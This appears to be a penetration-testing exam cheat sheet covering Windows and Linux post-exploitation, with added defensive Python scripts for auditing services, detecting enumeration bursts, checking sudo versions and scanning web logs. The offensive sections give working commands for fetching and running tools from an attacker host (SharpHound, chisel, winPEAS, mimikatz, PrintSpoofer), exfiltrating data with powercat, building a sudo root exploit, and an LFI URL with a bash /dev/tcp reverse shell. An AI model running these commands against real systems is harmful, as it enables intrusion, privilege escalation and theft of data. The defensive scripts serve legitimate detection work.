
Post Exploitation

HOST ENUMERATION WINDOWS

General Information

date /t
time /t
hostname
whoami
systeminfo

User Information

net user
net localgroup
net localgroup administrators
net use ( shows mapped shares, if any )

Network Information

ipconfig /all
ipconfig /displaydns
route print
netstat -ant
netstat -anob ( needs admin )

Interesting Locations

Explorer - view - hidden items ( turn on show hidden items )

Check each user's Documents, Downloads and Desktop folders

dir c:\windows\prefetch ( admin ) = see what executables have been run
dir /a:h
dir /o:d /t:w c:\windows\system32
dir /o:d /t:w c:\windows\system32\winevt\logs
dir /o:d /t:w c:\windows\temp
reg query hklm\software\microsoft\windows\currentversion\run /s   ( also check HKCU, and the RunOnce key )

Process and Services

tasklist /v
tasklist /svc
tasklist /svc | findstr /i "PID"
services.msc ( gui )
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a
sc query <service name>
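The for /f one-liner above prints the PathName of every service whose binary is not under system32. The Python script below is an added example, not part of these notes: it parses a constructed `wmic service list full` output (only a few Win32_Service properties are shown), applies the same non-system32 filter, and additionally flags unquoted paths containing spaces and binaries under user-writable directories, which is what a defender auditing the same output looks for. The service names and paths are made up for the example.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of `wmic service list full` output (not captured from a real host).
# Real output is a run of Key=Value lines per service, blocks separated by blank lines,
# with CRLF line endings; only a few of the Win32_Service properties are shown here.
SAMPLE_WMIC = """\

DisplayName=Windows Event Log
Name=EventLog
PathName=C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted
StartMode=Auto
StartName=NT AUTHORITY\\LocalService
State=Running


DisplayName=Acme Backup Agent
Name=AcmeBackup
PathName=C:\\Program Files\\Acme Backup\\agent.exe --service
StartMode=Auto
StartName=LocalSystem
State=Running


DisplayName=Vendor Updater
Name=VendorUpdate
PathName="C:\\Program Files (x86)\\Vendor\\updater.exe" /svc
StartMode=Manual
StartName=LocalSystem
State=Stopped


DisplayName=Odd Helper
Name=OddHelper
PathName=C:\\Users\\Public\\helper.exe
StartMode=Auto
StartName=LocalSystem
State=Running
"""


def parse_wmic_list_full(text):
    """Split wmic 'list full' output into one dict per service."""
    services, current = [], {}
    for line in text.splitlines():
        line = line.strip()  # also drops the CR of CRLF output
        if not line:
            if current:
                services.append(current)
                current = {}
            continue
        key, _, value = line.partition("=")
        current[key] = value
    if current:
        services.append(current)
    return services


def binary_path(pathname):
    """Return just the executable from a PathName value, whether or not it is quoted."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return pathname[1:pathname.find('"', 1)]
    m = re.match(r"(.*?\.exe)", pathname, re.I)  # unquoted: stop at the first .exe
    return m.group(1) if m else (pathname.split() or [pathname])[0]


def audit_services(services):
    """Apply the page's filter (PathName not under system32) plus two hardening checks."""
    findings = []
    for svc in services:
        pathname = svc.get("PathName", "")
        exe = binary_path(pathname)
        issues = []
        if "system32" not in pathname.lower():
            issues.append("outside-system32")  # what the find /i /v "system32" filter keeps
        if not pathname.strip().startswith('"') and " " in exe:
            issues.append("unquoted-path-with-spaces")  # Microsoft guidance: quote such paths
        parts = {p.lower() for p in PureWindowsPath(exe).parts}
        if parts & {"users", "temp", "programdata"}:
            issues.append("user-writable-location")  # binary where non-admins can often write
        if issues:
            findings.append((svc.get("Name"), exe, svc.get("StartName"), svc.get("StartMode"), issues))
    return findings


if __name__ == "__main__":
    for name, exe, account, mode, issues in audit_services(parse_wmic_list_full(SAMPLE_WMIC)):
        print(f"{name:<14} {mode:<7} {account:<26} {exe}  ->  {', '.join(issues)}")
```

Feed it the real output with `wmic service list full > services.txt` on the host and `parse_wmic_list_full(open("services.txt", encoding="utf-16").read())` on the analysis box; wmic writes UTF-16 when redirected to a file.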

schtasks
Task Scheduler ( gui, taskschd.msc )
schtasks /query /fo LIST /v
schtasks /query
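Seen from the defender's side, the commands in the enumeration sections above are the classic discovery sequence that process-creation logging (event 4688 with command-line auditing enabled) records. The Python detector below is an added example, not part of these notes: it replays constructed 4688-style records (timestamp, account, command line) and alerts when one account runs commands from four or more discovery categories within five minutes. The record format, account names, categories and thresholds are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not from a real host): one process-creation event per line
# as "UTC timestamp<TAB>account<TAB>command line", the fields a 4688 event would supply.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01Z\tCORP\\svc_backup\tC:\\Windows\\System32\\whoami.exe whoami
2024-05-01T10:00:05Z\tCORP\\svc_backup\tsysteminfo
2024-05-01T10:00:09Z\tCORP\\svc_backup\tnet user
2024-05-01T10:00:12Z\tCORP\\svc_backup\tnet localgroup administrators
2024-05-01T10:00:20Z\tCORP\\svc_backup\tipconfig /all
2024-05-01T10:00:31Z\tCORP\\svc_backup\ttasklist /svc
2024-05-01T10:00:40Z\tCORP\\svc_backup\treg query hklm\\software\\microsoft\\windows\\currentversion\\run /s
2024-05-01T10:02:00Z\tCORP\\jdoe\tipconfig /all
2024-05-01T11:30:00Z\tCORP\\jdoe\twhoami
"""

# One regex per discovery category, covering the commands listed in the enumeration
# sections above. "net1" is included because it is a common alias for net.exe.
DISCOVERY_PATTERNS = {
    "account": re.compile(r"\bwhoami\b|\bnet1?\s+(?:user|localgroup)\b", re.I),
    "system": re.compile(r"\bsysteminfo\b|\bhostname\b", re.I),
    "network": re.compile(r"\bipconfig\b|\broute\s+print\b|\bnetstat\b|\bnet1?\s+use\b", re.I),
    "process": re.compile(r"\btasklist\b|\bsc\s+query\b|\bschtasks\b|\bwmic\s+service\b", re.I),
    "persistence": re.compile(r"\breg\s+query\b.*currentversion\\run|\bprefetch\b", re.I),
}


def parse_events(text):
    """Parse the tab-separated sample format into (timestamp, account, command line) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, account, cmdline = line.split("\t", 2)
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), account, cmdline))
    return events


def classify(cmdline):
    """Return the set of discovery categories a command line belongs to (empty if none)."""
    return {name for name, rx in DISCOVERY_PATTERNS.items() if rx.search(cmdline)}


def detect_discovery_bursts(events, window=timedelta(minutes=5), min_categories=4):
    """Alert when one account runs commands from >= min_categories distinct discovery
    categories inside a sliding time window. Returns (account, first_ts, last_ts, categories)."""
    by_account = defaultdict(list)
    for ts, account, cmdline in sorted(events):
        categories = classify(cmdline)
        if categories:
            by_account[account].append((ts, categories))

    alerts = []
    for account, hits in by_account.items():
        start = 0
        for end in range(len(hits)):
            while hits[end][0] - hits[start][0] > window:
                start += 1  # slide the window forward until it fits
            seen = set().union(*(cats for _, cats in hits[start:end + 1]))
            if len(seen) >= min_categories:
                alerts.append((account, hits[start][0], hits[end][0], sorted(seen)))
                break  # one alert per account per run; a SIEM would throttle the same way
    return alerts


if __name__ == "__main__":
    for account, first, last, categories in detect_discovery_bursts(parse_events(SAMPLE_EVENTS)):
        print(f"{account}: {first:%H:%M:%S}-{last:%H:%M:%S} discovery burst {categories}")
```

A single `ipconfig /all` from a helpdesk account does not fire; the same account touching accounts, system, network and processes within a few minutes does. Tune the window and threshold to the environment, and remember that this only works where command-line logging is turned on.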

SharpHound Collection

On Kali:

Copy SharpHound from the staged location:
cp ~/pwnshare/tools/Sharphound.ps1 .

On Target:

powershell iwr -uri http://IP/SharpHound.ps1 -Outfile C:\Users\Public\SharpHound.ps1
Bypass the execution policy:
powershell -ep bypass
Import the module:
. C:\Users\Public\SharpHound.ps1
Run Invoke-BloodHound:
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\Public\ -OutputPrefix "oscp.exam_Audit" -ZipFilename oscp.exam_Audit.zip
Wait until it prints "Happy Hunting".

Setup BloodHound

bloodhound
Import the .zip

Using Powercat to Transfer Files:

On Kali:

locate powercat.ps1
cp /usr/share/windows-resources/powercat/powercat.ps1 .
nc -nvlp 4444 > NAME.zip

On Windows:

powershell iwr -uri http://IP/powercat.ps1 -Outfile C:\Users\Public\powercat.ps1
. C:\Users\Public\powercat.ps1
powercat -c IP -p 4444 -i C:\Users\Public\AUDIT.zip -v

Setup Tunnel

On Kali ( if not already done ):

https://github.com/jpillora/chisel/releases/tag/v1.7.7
wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_windows_amd64.gz -O chisel.gz
gzip -dk chisel.gz
mv chisel chisel.exe

Host Chisel on Kali

chisel server --port 8000 --socks5 --reverse

Connect from Target:

Download File:

powershell iwr -uri http://IP/chisel.exe -Outfile C:\Users\Public\chisel.exe
Execute:
C:\Users\Public\chisel.exe client IP:8000 R:socks
Example proxychains conf
On Kali, the default proxychains config is fine as is:
cat /etc/proxychains4.conf
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080

WinPEAs Script

On Kali:

We grab winPEASx64.exe and mimikatz, since systeminfo showed the host is x64.

locate winpeas
cp /usr/share/peass/winpeas/winPEASx64.exe .
cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
Serve with webup, or drop them into ~/pwnshare/tools and use WebDAV.

On Target:

powershell iwr -uri http://192.168.49.123/winPEASx64.exe -Outfile C:\Users\Public\winPEASx64.exe

Run it:
C:\Users\Public\winPEASx64.exe

On Kali:

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe -O PrintSpoofer64.exe

On Target:

powershell iwr -uri http://192.168.49.123/PrintSpoofer64.exe -Outfile C:\Users\Public\PrintSpoofer64.exe

Run it:
C:\Users\Public\PrintSpoofer64.exe

Check SUIDs ( Linux ), but nothing interesting.

Download from GitHub:
curl http://IP/suid3num.py -o suid3num.py
chmod +x suid3num.py
./suid3num.py

Sudo 1.8.31 Exploit - CVE-2021-3156

https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit

curl http://192.168.45.233:8088/shellcode.c -o shellcode.c
curl http://192.168.45.233:8088/exploit.c -o exploit.c
curl http://192.168.45.233:8088/Makefile -o Makefile
make
./exploit
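Before building anything, a quick version check tells you whether the host is even in scope for CVE-2021-3156. The Python below is an added example, not part of these notes or of the linked repository: it parses the first line of `sudo --version` (including the pN patch level) and compares it against the upstream affected ranges. The sample outputs are constructed. Caveat: distributions backport the fix without changing the upstream version string, so a hit here means "check the package changelog or vendor advisory", not "vulnerable".

```python
import re

# CVE-2021-3156 (Baron Samedit) affects upstream sudo legacy releases 1.8.2 through 1.8.31p2
# and stable releases 1.9.0 through 1.9.5p1; upstream fixed it in 1.9.5p2.
AFFECTED_RANGES = (
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
)

VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(output):
    """Return (major, minor, patch, p-level) from `sudo --version` output; p-level is 0 if absent."""
    m = VERSION_RE.search(output)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def is_upstream_affected(version):
    """True if this upstream version falls in an affected range (ignores distro backports)."""
    return any(low <= version <= high for low, high in AFFECTED_RANGES)


def assess(output):
    """Parse and classify in one step: returns (version tuple, affected flag)."""
    version = parse_sudo_version(output)
    return version, is_upstream_affected(version)


# Constructed sample outputs; the first mirrors the version this section targets.
SAMPLE_OUTPUTS = {
    "legacy": "Sudo version 1.8.31\nSudoers policy plugin version 1.8.31\n",
    "legacy-p2": "Sudo version 1.8.31p2\n",
    "fixed": "Sudo version 1.9.5p2\n",
    "old": "Sudo version 1.8.1\n",
}

if __name__ == "__main__":
    for label, out in SAMPLE_OUTPUTS.items():
        version, affected = assess(out)
        print(f"{label:<10} {'.'.join(map(str, version[:3]))}p{version[3]}  upstream-affected={affected}")
```

On a live host, pipe the real output in with `assess(subprocess.run(["sudo", "--version"], capture_output=True, text=True).stdout)`.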

Searching for Suspicious PHP Files

find -L /var/ -name "*.php" 2>/dev/null

Setup Reverse Shell via LFI

http://127.0.0.1:8000/backend/?view=../../../../../var/crash/test.php&cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.233%2F4444%200%3E%261%22
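The request above leaves a very recognisable trace in the web server's access log: a traversal sequence in one parameter and a shell command in another. The Python below is an added example, not part of these notes: it parses constructed Apache combined-format log lines (the fourth one is the URL from this section as the server would log it), percent-decodes each query parameter until it stops changing, and flags traversal, shell markers and double encoding. The log lines, client addresses and indicator regexes are assumptions for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed Apache combined-format access log lines (not from a real server); the fourth
# request is the LFI-plus-command URL from this section, as the web server would log it.
SAMPLE_LOG = r'''
10.0.0.5 - - [01/May/2024:10:00:01 +0000] "GET /backend/?view=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/May/2024:10:00:07 +0000] "GET /backend/?view=../../../../../etc/passwd HTTP/1.1" 200 2048 "-" "curl/8.0"
10.0.0.9 - - [01/May/2024:10:00:15 +0000] "GET /backend/?view=..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 2048 "-" "curl/8.0"
10.0.0.9 - - [01/May/2024:10:00:31 +0000] "GET /backend/?view=../../../../../var/crash/test.php&cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.45.233%2F4444%200%3E%261%22 HTTP/1.1" 200 0 "-" "curl/8.0"
10.0.0.5 - - [01/May/2024:10:01:00 +0000] "GET /static/app.js HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
'''

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
TRAVERSAL_RE = re.compile(r"\.\./|\.\.\\")
# Markers of a shell being handed a command: /dev/tcp redirection, sh/bash -i or -c, nc -e, >&.
SHELL_RE = re.compile(r"/dev/tcp/|\b(?:ba)?sh\s+-[ic]\b|\bnc\b.*\s-e\b|>&")


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing; the round count exposes double encoding."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def inspect_request(target):
    """Return (parameter, indicator) pairs for every query parameter that looks hostile."""
    findings = []
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")  # keep the raw value; decode it ourselves below
        value, rounds = fully_decode(raw)
        if TRAVERSAL_RE.search(value):
            findings.append((name, "path-traversal"))
        if SHELL_RE.search(value):
            findings.append((name, "shell-command"))
        if rounds > 1:
            findings.append((name, "double-encoded"))
    return findings


def scan_access_log(text):
    """Return (client ip, timestamp, request target, findings) for each suspicious log line."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = inspect_request(m["target"])
        if findings:
            alerts.append((m["ip"], m["ts"], m["target"], findings))
    return alerts


if __name__ == "__main__":
    for ip, ts, target, findings in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} {target[:60]}... {findings}")
```

Decoding in a loop rather than once is the part that matters: a single `unquote` would see `..%2f` in the third request and miss the traversal. The same approach applies to a WAF rule or a SIEM parser; the regexes here are deliberately narrow and will need widening for other shells and encodings.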